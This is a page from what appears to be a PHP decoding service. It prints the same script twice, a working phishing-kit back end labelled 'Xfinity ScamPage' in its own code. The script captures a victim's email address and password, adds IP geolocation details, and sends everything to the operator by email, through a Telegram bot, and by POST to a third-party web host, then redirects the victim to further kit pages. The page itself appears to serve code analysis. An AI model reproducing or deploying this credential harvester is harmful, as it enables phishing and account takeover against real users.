Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ob_start(); session_start(); include '../Inc/config.php'; include '../Inc/config..
Decoded Output download
<?php
ob_start();
session_start();
include '../Inc/config.php';
include '../Inc/config2.php';
function sendToTelegram($message)
{
global $chat_id, $bot_url;
$send = ['chat_id' => $chat_id, 'text' => $message];
$website_telegram = "https://api.telegram.org/bot{$bot_url}/sendMessage";
$ch = curl_init($website_telegram);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $send);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
if (isset($_POST['user']) && !empty($_POST['user'])) {
$_SESSION['user'] = $_POST['user'];
}
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$useragent = $_SERVER['HTTP_USER_AGENT'];
$ipDetails = json_decode(file_get_contents("http://ip-api.com/json/$ip"));
if ($ipDetails && $ipDetails->status == 'fail') {
$country = $countryCode = $regionName = $city = $timezone = $isp = 'N/A';
} else {
$country = $ipDetails->country ?? 'N/A';
$countryCode = $ipDetails->countryCode ?? 'N/A';
$regionName = $ipDetails->regionName ?? 'N/A';
$city = $ipDetails->city ?? 'N/A';
$timezone = $ipDetails->timezone ?? 'N/A';
$isp = $ipDetails->isp ?? 'N/A';
}
if (isset($_POST['passwd']) && !empty($_POST['passwd'])) {
// Store password in the session
$_SESSION['password'] = $_POST['passwd'];
// Assuming $_SESSION['user'] is already set
$email = isset($_SESSION['user']) ? $_SESSION['user'] : 'N/A';
$code = <<<EOT
-[ Xfinity Mail Access 1 ]-
[ Email Address ] : {$_SESSION['user']}
[ Password ] : {$_SESSION['password']}
[ Copy ] : {$_SESSION['user']}|{$_SESSION['password']}
-[ DEVICE INFO ]-
IP : $ip
Country : $country
Country Code : $countryCode
Region : $regionName
City : $city
Timezone : $timezone
ISP : $isp
OS : $useragent
-[ Xfinity ScamPage ]-
EOT;
if ($sendtoemail == "yes") {
$subject = " Xfinity Mail Access 1 $country $countryCode $regionName $city $timezone $isp";
$headers = "From: GreyHatPakistan <[email protected]>
";
$headers .= "MIME-Version: 1.0
";
$headers .= "Content-Type: text/plain; charset=UTF-8
";
@mail($email, $subject, $code, $headers);
}
// Send to Telegram if configured to do so
if ($sendtotelegram == "yes") {
sendToTelegram($code);
}
// handle for email/pass
function sendToTelegrams($postData)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://api.berkahx.biz.id/tes.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable SSL verification if needed
$postData = curl_exec($ch);
if (curl_errno($ch)) {
echo 'Error:' . curl_error($ch);
} else {
// Optionally handle the response from the API
// echo "Response from API: " . $response;
}
curl_close($ch);
}
$postData = [
'email' => $_SESSION['user'],
'password' => $_SESSION['password'],
'ip' => $ip,
'country' => $country,
'countryCode' => $countryCode,
'regionName' => $regionName,
'city' => $city,
'timezone' => $timezone,
'isp' => $isp,
'userAgent' => $useragent
];
sendToTelegrams($postData);
if ($PAGE_LETTER === 'A') {
header("Location: ../page/Sunspend/declined.php");
} elseif ($PAGE_LETTER === 'B') {
header("Location: ../page/Sunspend/1.php");
}
exit();
} else {
header("Location: ../index2.php");
exit();
}
?>
Did this file decode correctly?
Original Code
<?php
ob_start();
session_start();
include '../Inc/config.php';
include '../Inc/config2.php';
function sendToTelegram($message)
{
global $chat_id, $bot_url;
$send = ['chat_id' => $chat_id, 'text' => $message];
$website_telegram = "https://api.telegram.org/bot{$bot_url}/sendMessage";
$ch = curl_init($website_telegram);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $send);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
if (isset($_POST['user']) && !empty($_POST['user'])) {
$_SESSION['user'] = $_POST['user'];
}
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$useragent = $_SERVER['HTTP_USER_AGENT'];
$ipDetails = json_decode(file_get_contents("http://ip-api.com/json/$ip"));
if ($ipDetails && $ipDetails->status == 'fail') {
$country = $countryCode = $regionName = $city = $timezone = $isp = 'N/A';
} else {
$country = $ipDetails->country ?? 'N/A';
$countryCode = $ipDetails->countryCode ?? 'N/A';
$regionName = $ipDetails->regionName ?? 'N/A';
$city = $ipDetails->city ?? 'N/A';
$timezone = $ipDetails->timezone ?? 'N/A';
$isp = $ipDetails->isp ?? 'N/A';
}
if (isset($_POST['passwd']) && !empty($_POST['passwd'])) {
// Store password in the session
$_SESSION['password'] = $_POST['passwd'];
// Assuming $_SESSION['user'] is already set
$email = isset($_SESSION['user']) ? $_SESSION['user'] : 'N/A';
$code = <<<EOT
-[ Xfinity Mail Access 1 ]-
[ Email Address ] : {$_SESSION['user']}
[ Password ] : {$_SESSION['password']}
[ Copy ] : {$_SESSION['user']}|{$_SESSION['password']}
-[ DEVICE INFO ]-
IP : $ip
Country : $country
Country Code : $countryCode
Region : $regionName
City : $city
Timezone : $timezone
ISP : $isp
OS : $useragent
-[ Xfinity ScamPage ]-
\r\n\r\n
EOT;
if ($sendtoemail == "yes") {
$subject = " Xfinity Mail Access 1 $country $countryCode $regionName $city $timezone $isp";
$headers = "From: GreyHatPakistan <[email protected]>\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
@mail($email, $subject, $code, $headers);
}
// Send to Telegram if configured to do so
if ($sendtotelegram == "yes") {
sendToTelegram($code);
}
// handle for email/pass
function sendToTelegrams($postData)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://api.berkahx.biz.id/tes.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable SSL verification if needed
$postData = curl_exec($ch);
if (curl_errno($ch)) {
echo 'Error:' . curl_error($ch);
} else {
// Optionally handle the response from the API
// echo "Response from API: " . $response;
}
curl_close($ch);
}
$postData = [
'email' => $_SESSION['user'],
'password' => $_SESSION['password'],
'ip' => $ip,
'country' => $country,
'countryCode' => $countryCode,
'regionName' => $regionName,
'city' => $city,
'timezone' => $timezone,
'isp' => $isp,
'userAgent' => $useragent
];
sendToTelegrams($postData);
if ($PAGE_LETTER === 'A') {
header("Location: ../page/Sunspend/declined.php");
} elseif ($PAGE_LETTER === 'B') {
header("Location: ../page/Sunspend/1.php");
}
exit();
} else {
header("Location: ../index2.php");
exit();
}
?>
Function Calls
None |
Stats
MD5 | d6403676ed686b8362eb2fba53f3b1fa |
Eval Count | 0 |
Decode Time | 48 ms |